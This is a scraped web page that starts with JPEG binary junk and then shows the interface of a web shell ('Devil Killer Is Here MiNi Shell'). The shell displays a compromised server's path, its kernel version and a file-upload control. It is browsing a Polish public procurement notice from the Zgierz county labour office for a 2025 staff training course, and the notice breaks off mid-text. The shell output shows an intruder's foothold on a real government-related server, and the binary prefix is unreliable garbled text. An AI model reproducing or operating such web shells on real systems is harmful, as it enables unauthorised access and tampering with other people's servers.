JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20250416/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20250416/0019487901-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Szkolenie grupowe dla pracowników Powiatowego Urzędu Pracy w Zgierzu pod nazwą: „Ustawa o rynku pracy i służbach zatrudnienia – kompendium wiedzy pracownika powiatowego urzędu pracy” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi zamawiający centralny</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowy Urząd Pracy w Zgierzu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 472286002</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Barona 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zgierz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">95-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL712 - Łódzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">42 714 12 77</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">42 717 41 60</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">lozg@praca.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zgierz.praca.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Promocja zatrudnienia, łagodzenie skutków bezrobocia oraz aktywizacja zawodowa </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Szkolenie grupowe dla pracowników Powiatowego Urzędu Pracy w Zgierzu pod nazwą: „Ustawa o rynku pracy i służbach zatrudnienia – kompendium wiedzy pracownika powiatowego urzędu pracy” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-92cdd642-9476-48e0-b1aa-bd710f13e5a1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00194879</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-04-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00024086/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.5 Szkolenie grupowe dla pracowników PUP w Zgierzu: Praktyczne zastosowanieprzepisów ustawy o rynku pracy i służbach zatrudnienia w działalnościPUP.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-92cdd642-9476-48e0-b1aa-bd710f13e5a1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl. <br/>2. Korzystanie z Platformy e-Zamówienia jest bezpłatne<br/>3. Do kontaktu z Wykonawcami wyznaczona została Karolina Przepiórska-Tokarz, Wydział Zarządzania, Nadzoru i Administrowania Majątkiem, nr tel. 42 714-12-74, godz. pracy 7.30 – 15.30, e -mail: przetargi@pupzgierz.pl.<br/>4. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>5. Komunikacja w postępowaniu, z wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi.<br/>6. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia<br/>7. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”.<br/>8. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>9. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (22) 458 77 99 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>10.	Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub w konkursie (Dz. U. z 2020 r. poz. 2452) zwanym dalej jako „rozporządzenie Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych”.<br/>11. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy pzp, ww. regulacje nie będą miały bezpośredniego zastosowania.<br/>12. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej wskazanych w SWZ. <br/>13. Za datę przekazania oferty, oświadczenia o którym mowa w art. 125 ust. 1 Pzp, podmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów przekazywanych w postępowaniu przyjmuje się datę ich przekazania przez platformę e-Zamówienia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem Pani/Pana danych osobowych jest Powiatowy Urząd Pracy w Zgierzu z siedzibą przy ulicy Barona 10, kod pocztowy 95-100 Zgierz.Inspektorem ochrony danych w Powiatowym Urzędzie Pracy w Zgierzu jest Pani Sylwia Skalska, kontakt <br/>e-mail: iod@pupzgierz.pl, tel.: (42) 714-12-83.<br/>Publiczne służby zatrudnienia, które tworzy m.in. Powiatowy Urząd Pracy w Zgierzu, przetwarzają dane osobowe osób fizycznych w celu realizacji zadań ustawowych, w tym weryfikacji uprawnień i danych, zapewnienia pomocy określonej w ustawie, prowadzenia postępowań kontrolnych, realizacji obowiązków sprawozdawczych<br/>i obowiązków w zakresie statystyki publicznej.<br/>Pani/Pana dane osobowe: <br/>• są przetwarzane na podstawie art. 6 ust. 1 lit. c RODO tj. przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze, tj. w celu realizacji ustawy z dnia 20 kwietnia 2004r. <br/>o promocji zatrudnienia i instytucjach rynku pracy, zwanej dalej ustawą oraz aktów wykonawczych do ww. ustawy, a także w związku z ustawą z dnia 11 września 2019r.. prawo zamówień publicznych, a następnie dla wypełnienia obowiązku archiwizacji dokumentów wynikającego z ustawy z dnia 14 lipca 1983r.o narodowym zasobie archiwalnym i archiwach; są przetwarzane zgodnie z ustawą z dnia 10 maja 2018r.o ochronie danych osobowych;<br/>•mogą być przetwarzane w celu realizacji umowy, wykonania zadań realizowanych w interesie publicznym, do realizacji celów wynikających z prawnie uzasadnionych interesów administratora, takich jak zabezpieczenie dochodzenia roszczeń.<br/>Pani/Pana dane osobowe są przekazywane do: <br/>•rejestru centralnego w którym są one przetwarzane przez ministra właściwego do spraw pracy i udostępniane <br/>w trybie i na zasadach określonych w ustawie z dnia 17 lutego 2005r. o informatyzacji działalności podmiotów realizujących zadania publiczne innym podmiotom realizującym zadania publiczne na podstawie odrębnych przepisów. <br/>•podmiotów przetwarzających, z którymi Urząd zawarł umowy powierzenia, w szczególności do: •Spółki Akcyjnej SYGNITY •Spółki cywilnej INF-US •Banku Spółdzielczego w Zgierzu; •Firmy świadczącej usługi prawne dla Urzędu•Firmy świadczącej usługi niszczenia dokumentów.<br/>•wiadomości publicznej poprzez:<br/>1) zamieszczenie na stronie podmiotowej Biuletynu Informacji Publicznej Zamawiającego (https://bip.pupzgierz.pl);<br/>2) zamieszczenie w bazie konkurencyjności (https://bazakonkurencyjności.funduszeeuropejskie.gov.pl) <br/> –dotyczy zamówień o wartości szacunkowej przekraczającej 50.000,00 PLN netto, <br/> a poniżej 130.000,00 zł netto, finansowanych z Europejskiego Funduszu Społecznego;<br/>3) zamieszczenie w Biuletynie Zamówień Publicznych (https://bzp.uzp.gov.pl) – dotyczy zamówień o wartości<br/> równej lub przekraczającej kwotę 130.000,00 zł a mniejszej niż progi unijne określane obwieszczeniem Prezesa UZP w sprawie aktualnych progów unijnych.<br/>dane mogą być przekazane do:<br/>•innych organów/osób upoważnionych na podstawie przepisów prawa • m.in. w trybie wnioskowym, <br/>np. do Państwowej Inspekcji Pracy, organów wymiaru sprawiedliwości (m.in. Sądów, Policji, Komorników Sądowych).<br/>Pani/Pana dane osobowe są przechowywane w rejestrze centralnym oraz w rejestrze Powiatowego Urzędu Pracy <br/>w Zgierzu przez okres 50 lat, licząc od końca roku kalendarzowego, w którym zakończono udzielanie pomocy.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">brak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DZ.2612.4.2025.KPT</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Szkolenie przeznaczone jest dla 48 pracowników Powiatowego Urzędu Pracy w Zgierzu.<br/>2.	Celem szkolenia jest zdobycie przez uczestników wiedzy w zakresie wprowadzonych ustawą zmian w działaniach realizowanych przez PUP oraz umiejętności praktycznego zastosowania nowych przepisów ustawy w wykonywaniu obowiązków służbowych.<br/>3.	Termin realizacji zamówienia: pomiędzy 27.05.2025 r. a 30.06.2025 r.<br/>4.	Organizacja szkolenia:<br/>1)	Szkolenie musi zostać przeprowadzone dla 4 grup, z których każda będzie liczyła nie więcej niż 12 osób.<br/>2)	Zajęcia muszą odbywać się w dni robocze, z wyjątkiem 20.06.2025 r.. <br/>Czas trwania szkolenia musi wynosić 8 godzin dydaktycznych plus <br/>3 przerwy, każda trwająca 15 minut.<br/>3)	Przez godzinę dydaktyczną kursu Zamawiający rozumie 45 minut zegarowych. <br/>4)	Zajęcia powinny zaczynać się nie wcześniej niż o godz. 08.00, a kończyć nie później niż o godzinie 15.00,<br/>5)	Szkolenie odbywać się będzie w sali konferencyjnej Powiatowego Urzędu Pracy w Zgierzu, ul. H. Barona 10.<br/>6)	Wykonawca musi dysponować kadrą dydaktyczną, posiadającą doświadczenie w prowadzeniu szkoleń dla pracowników powiatowych urzędów pracy w zakresie stosowania przepisów ustawy o promocji zatrudnienia i instytucjach rynku pracy.<br/>5.	Program szkolenia:<br/>1)	Szkolenie odbywać się będzie w formie wykładu interaktywnego,<br/>z zastosowaniem form dyskusji, case study. <br/>2)	Zagadnienia tematyczne muszą być dostosowane do poszczególnych grup uczestników po wcześniejszym uzgodnieniu z zamawiającym.<br/>3)	Zakres tematyczny szkolenia musi obejmować zagadnienia zawarte <br/>w ustawie, w szczególności dotyczące:<br/>a)	rejestracji, statusu bezrobotnego i poszukującego pracy, świadczeń dla bezrobotnych,<br/>b)	form pomocy kierowanych do bezrobotnych, poszukujących pracy i osób niezarejestrowanych (pośrednictwo pracy i poradnictwo zawodowe, rozwój umiejętności i podnoszenie kwalifikacji, zatrudnienie subsydiowane, wsparcie zatrudnienia osób w szczególnej sytuacji, wspieranie przedsiębiorczości i tworzenie nowych stanowisk pracy, wsparcie dla długotrwale bezrobotnych, dla osób do 30. r.ż., dodatkowe formy pomocy, pakiet aktywizacyjny,<br/>c)	funduszu pracy,<br/>d)	indywidualnych kont oraz prowadzenia i udostępniania dokumentacji w systemie teleinformatycznym,<br/>e)	przepisów przejściowych.<br/>6.	Każdy uczestnik szkolenia musi otrzymać w dniu szkolenia materiały dydaktyczne w formie papierowej, adekwatne do treści zajęć (np. skrypt).<br/>7.	Każdy uczestnik szkolenia musi otrzymać w dniu szkolenia także harmonogram zajęć i bezzwrotne materiały piśmienne tj. notes oraz długopis.<br/>8.	Na zakończenie szkolenia Wykonawca musi przeprowadzić wśród uczestników szkolenia ankietę oceniającą dane szkolenie i przekazać ją Zamawiającemu.<br/>9.	Po ukończeniu szkolenia Wykonawca zobowiązany jest wydać Zamawiającemu zaświadczenie dla każdego uczestnika, potwierdzające ukończenie szkolenia. <br/>10.	Wykonawca zobowiązany jest do prowadzenia przez cały czas trwania szkolenia imiennej listy obecności, listy potwierdzającej otrzymanie materiałów dydaktycznych oraz cateringu wskazanego w pkt 11. Terminy przekazania list Zamawiającemu określi zawarta umowa szkoleniowa.<br/>11.	Wykonawca musi zapewnić każdemu uczestnikowi szkolenia, każdego dnia zajęć: <br/>	serwis kawowo-herbaciany w ramach, którego zobowiązany jest zapewnić następujące produkty spożywcze w ilości dostosowanej do liczby uczestników szkolenia: kawa z ekspresu oraz kawa rozpuszczalna, herbata ekspresowa w torebkach ze sznurkiem, cukier i słodzik, mleko, cytryna oraz woda mineralna niegazowana w ilości zapewniającej swobodny dostęp dla wszystkich uczestników szkolenia;<br/>	susz konferencyjny w którego skład wchodzą: kruche ciasteczka <br/>(np. z marmoladą, ziarnami, wafelki) oraz słone przekąski (np. paluszki, krakersy) a także owoce – minimum dwa rodzaje (np. banany, jabłka, mandarynki). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-05-27 do 2025-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert dokonana będzie według zasady procentowo-punktowej w oparciu <br/>o następujące kryteria:<br/>1)	cena – 60 %,<br/>2)	udział kosztów bezpośrednich do łącznego kosztu szkolenia – 20%<br/>3)	dostępność wykładowcy po realizacji szkolenia – 20%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny, kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">dostępność wykładowcy po realizacji szkolenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ust. 2 ustawy Pzp Zamawiający określa warunki udziału w postępowaniu dotyczące:<br/>1)	W zakresie zdolności do występowania w obrocie gospodarczym.<br/> Posiadanie przez Wykonawcę aktualnego wpisu do właściwego rejestru lub ewidencji działalności gospodarczej.<br/>Oceny spełnienia tego warunku Zamawiający dokona na podstawie dołączonego do oferty oświadczenia Wykonawcy dotyczącego spełnienia warunków udziału w postępowaniu, aktualnego na dzień składnia, na druku Zamawiającego, stanowiącym załącznik nr 3 do SWZ.<br/>Wykonawca nie jest zobowiązany do złożenia dokumentu w przypadku wskazania przez niego w Formularzu ofertowym danych umożliwiających dostęp do tych dokumentów w ogólnopolskich i bezpłatnych bazach danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne.<br/>2)	W zakresie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej. <br/> Posiadanie przez Wykonawcę wpisu do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy, właściwy ze względu na siedzibę Wykonawcy, aktualizowanego zgodnie z obowiązującymi przepisami w tym zakresie. <br/>3)	W zakresie sytuacji ekonomicznej lub finansowej <br/>Zamawiający nie stawia szczegółowych warunków w tym zakresie.<br/>4)	W zakresie zdolności technicznej lub zawodowej.<br/>a)	Posiadanie przez Wykonawcę doświadczenia w prowadzeniu szkoleń <br/>o tematyce podobnej do tematyki szkolenia będącego przedmiotem niniejszego postępowania, przez co Zamawiający rozumie przeprowadzenie <br/>w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie co najmniej dwóch usług szkoleniowych z zakresu stosowania przepisów ustawy o promocji zatrudnienia i instytucjach rynku pracy w wymiarze co najmniej 8 godzin, dla grup co najmniej 10 – o osobowych. <br/>b)	Dysponowanie osobami zdolnymi do wykonania zamówienia, przez co Zamawiający rozumie posiadanie przez kadrę wykładowców doświadczenia w prowadzeniu szkoleń dla pracowników powiatowych urzędów pracy w zakresie stosowania przepisów ustawy o promocji zatrudnienia i instytucjach rynku pracy.	Oceny spełnienia tego warunku Zamawiający dokona na podstawie załączonego do oferty oświadczenia Wykonawcy dotyczącego spełnienia warunków udziału w postępowaniu, aktualnego na dzień składania ofert, na druku Zamawiającego, stanowiącym załącznik nr 3 do SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Jeżeli wykonawca nie załączy do oferty wymaganych podmiotowych środków dowodowych, Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących dokumentów, aktualnych na dzień złożenia, w celu potwierdzenia braku podstaw wykluczenia z udziału w postępowaniu:<br/>c) zaświadczenie właściwego naczelnika urzędu skarbowego 